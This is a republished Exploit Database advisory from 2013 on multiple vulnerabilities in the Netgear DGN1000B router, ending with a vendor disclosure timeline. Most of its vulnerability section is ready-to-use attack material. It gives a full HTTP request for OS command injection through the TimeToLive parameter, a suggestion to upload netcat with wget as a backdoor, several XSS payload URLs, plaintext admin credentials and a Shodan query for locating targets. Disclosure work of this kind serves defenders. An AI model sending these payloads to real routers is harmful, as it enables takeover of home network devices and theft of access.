Netgear DGN1000B – Multiple Vulnerabilities

• Exploit Database
• 13 阅读

• 作者： m-1-k-3
  日期： 2013-02-07
• 类别：

  • webapps
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/24464/

• Device Name: DGN1000B
  Vendor: Netgear
  
  ============ Vulnerable Firmware Releases: ============
  
  Firmwareversion:	V1.1.00.24
  Firmwareversion:	V1.1.00.45
  
  Download: http://downloadcenter.netgear.com/de/product/DGN1000
  
  ============ Device Description: ============
  
  The N150 Wireless ADSL2+ Modem Router DGN1000 provides you with an easy and secure way to set up a wireless home network with fast access to the Internet over a high-speed digital subscriber line (DSL). The N150 Modem Router has a built-in DSL modem and is compatible with all major DSL Internet service providers. The security features let you block unsafe Internet content and applications, and protect the devices that you connect to your home network.
  
  Source: http://support.netgear.com/product/DGN1000
  
  ============ Shodan Torks ============
  
  Shodan Search: NETGEAR DGN1000
  
  ============ Vulnerability Overview: ============
  
  * OS Command Injection in the UPNP configuration: 
  
  The vulnerability is caused by missing input validation in the TimeToLive parameter and can be exploited to inject and execute arbitrary shell commands. It is possible to upload and execute a backdoor to compromise the device.
  
  Param: TimeToLive
  POST /setup.cgi HTTP/1.1
  Host: 192.168.178.188
  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:14.0) Gecko/20100101 Firefox/14.0.1
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
  Accept-Encoding: gzip, deflate
  Proxy-Connection: keep-alive
  Referer: http://192.168.178.188/setup.cgi?next_file=upnp.htm
  Authorization: Basic XXX
  Content-Type: application/x-www-form-urlencoded
  Content-Length: 185
  Connection: close
  
  UPnP=UPnP&AdverTime=30&TimeToLive=`%20COMMAND%20`&save=+Anwenden&todo=save&this_file=upnp.htm&next_file=upnp.htm&h_UPnP=enable&hiddenAdverTime=30&hiddenTimeToLive=4
  
  Change the Request Methode from HTTP Post to HTTP GET:
  
  http://192.168.178.188/setup.cgi?UPnP=UPnP&AdverTime=30&TimeToLive=`%20COMMAND%20`&save=+Anwenden&todo=save&this_file=upnp.htm&next_file=upnp.htm&h_UPnP=enable&hiddenAdverTime=30&hiddenTimeToLive=4
  
  
  It is possible to cross compile Netcat and upload it via wget, adjust the permissions and execute it. Have phun ;)
  
  Sources including needed toolchain: http://kb.netgear.com/app/answers/detail/a_id/2649
  direct download: http://www.downloads.netgear.com/files/GPL/DGN1000B_VB1.00.45_GR_src.tar...
  
  Screenshot: http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/DGN1000B-os-command-wget-check.png
  Screenshot: http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/DGN1000B-r00ted.png
  
  * Insecure Cryptographic Storage: 
  
  There is no password hashing implemented and so it is saved in plain text on the system:
  cat /tmp/etc/htpasswd
  admin:password
  
  * XSS 
  
  Injecting scripts into the following parameters reveals that these parameters are not properly validated for malicious input. You need to be authenticated or you have to find other methods for inserting the malicious JavaScript code.
  
  -> Sicherheit -> Dienste -> neuen Dienst anlegen -> Dienstname
  
  Param: service_name
  
  http://192.168.178.188/setup.cgi?service_name=%22%3E%3Cimg%20src=%220%22%20onerror=alert%282%29%3E&svc_type=tcp&serv_sport=1&serv_endport=2&save=Anwenden&todo=save&h_svc_type=tcp&edit=1&h_ruleSelect=0&this_file=servinfo.htm&next_file=fw_serv.htm
  
  -> WLAN -> Zugriffsliste anpassen -> Hinzufügen -> Gerätename
  
  Param: device
  
  http://192.168.178.188/setup.cgi?accessLimit=accessLimit&device=%22%3E%3Cimg+src%3D%220%22+onerror=alert(2)>&wirelist_mac=01-11-22-33-44-66&h_accessLimit=enable&h_ruleSelect=0&todo=addmanual&this_file=m_access.htm&next_file=m_access.htm
  
  Param: ssid_num
  
  http://192.168.178.188/setup.cgi?next_file=adv_wireless.htm&ssid_num=a%22%3E%3Cscript%3Ealert%281%29%3C/script%3E&flag=1
  
  Param: h_skeyword
  
  http://192.168.178.188/setup.cgi?skeyword=1&cfKeyWord_Domain=&KeyWordList=0&todo=delete&this_file=keyword.htm&next_file=keyword.htm&h_skeyword=115bcf%22%3E%3Cscript%3Ealert%281%29%3C/script%3Edc575b170bc38bebe&h_KeyWordList=&h_ruleSelect=0&h_trustipenable=disable&c4_Trusted_IPAddress=
  
  Param: cfKeyWord_Domain
  
  http://192.168.178.188/setup.cgi?skeyword=1&cfKeyWord_Domain=5d0a9%3Cscript%3Ealert%281%29%3C/script%3E&todo=addkeyword&this_file=keyword.htm&next_file=keyword.htm&h_skeyword=1&h_KeyWordList=&h_ruleSelect=&h_trustipenable=disable&c4_Trusted_IPAddress=
  
  ============ Solution ============
  
  No known solution available.
  
  ============ Credits ============
  
  The vulnerability was discovered by Michael Messner
  Mail: devnull#at#s3cur1ty#dot#de
  Web: http://www.s3cur1ty.de
  Advisory URL: http://www.s3cur1ty.de/m1adv2013-005
  Twitter: @s3cur1ty_de
  
  ============ Time Line: ============
  
  October 2012 - discovered vulnerability
  15.10.2012 - Privately reported all details to vendor via email
  23.10.2012 - Privately reported all details to vendor via webinterface
  24.10.2012 - Netgear replied to forward the details internally
  31.10.2012 - Netgear closes the case
  31.10.2012 - Requested more details why the case is now closed.
  31.10.2012 - Netgear responded that they will check the state of the case
  06.11.2012 - Netgear requested the Serial Number of the device
  08.11.2012 - Responded with the Serial Number
  13.11.2012 - something goes on - I got a product registration confirmation
  03.12.2012 - Case closed by Netgear - No new firmware available
  16.01.2013 - Netgear contacted me again requesting to check a Beta version
  22.01.2013 - Tested Beta Firmware and gave feedback to vendor
  06.02.2013 - public release
  
  ===================== Advisory end =====================